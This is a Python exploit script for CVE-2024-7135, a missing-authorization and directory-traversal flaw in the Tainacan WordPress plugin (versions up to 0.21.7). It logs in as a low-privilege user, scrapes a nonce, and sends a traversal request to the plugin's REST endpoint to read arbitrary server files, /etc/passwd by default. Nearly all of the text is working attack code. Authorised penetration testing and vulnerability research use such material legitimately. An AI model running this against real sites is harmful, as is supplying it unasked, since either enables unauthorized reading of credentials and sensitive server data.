#!/usr/bin/env python3
import argparse
import requests
import re
from getpass import getpass
from bs4 import BeautifulSoup
import os

## Exploit script by @RandomRobbieBF

http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"




def vulncheck(url, username, password, ff):
    # Perform vulnerability check logic here
    print("Vulnerability check:", url)

    # Login to WordPress
    login_url = f"{url}/wp-login.php"
    session = requests.Session()
    login_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": f"{url}/wp-admin/profile.php",
    }

    try:
        login_response = session.post(login_url, data=login_data, headers={"User-Agent": user_agent})
        login_response.raise_for_status()
        # Extract the required cookies from the response headers
        cookies = login_response.cookies
        # Confirm successful login
        if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
            print("Logged in successfully.")
            try:
                soup = BeautifulSoup(login_response.text, 'html.parser')
                script_tag = soup.find('script', id='tainacan-blocks-query-variations-js-extra')
                javascript_content = script_tag.string
                match = re.search(r'"nonce":"(.*?)"', javascript_content)
                nonce_value = match.group(1)
            except Exception as e:
            	print("Failed to extract nonce - "+str(e)+"")
            	exit()
        else:
            print("Failed to log in.")
            exit()
        
        main_url = f"{url}/wp-json/tainacan/v2/bg-processes/file?guid=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e"+ff+"&_wpnonce="+nonce_value+""
        ajax_response = session.get(main_url, headers={"User-Agent": user_agent,"X-Requested-With": "XMLHttpRequest"})
        ajax_response.raise_for_status()
        # Check if option set successfully
        if ajax_response.status_code == 200:
           print("Extracted text:\n\n", ajax_response.text)
        else:
           print(""+ajax_response.text+"")
        

    except requests.exceptions.RequestException as e:
        print(f"Request failed with an error: {e}")


# Add the vulnerability description as a comment
DESCRIPTION = """
Tainacan <= 0.21.7 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Read
Description:
CVE-2024-7135 | The Tainacan plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_file' function in all versions up to, and including, 0.21.7. The function is also vulnerable to directory traversal. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.
"""

# Use argparse to get the URL, username, and password arguments
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-u", "--url", help="Website URL", required=True)
parser.add_argument("-un", "--username", help="WordPress username")
parser.add_argument("-p", "--password", help="WordPress password")
parser.add_argument("-f", "--file", default="/etc/passwd", help="File to display")
args = parser.parse_args()

# Prompt for password if not provided as an argument
if not args.password:
    args.password = getpass("Enter the WordPress password: ")


# Usage
vulncheck(args.url, args.username, args.password, args.file)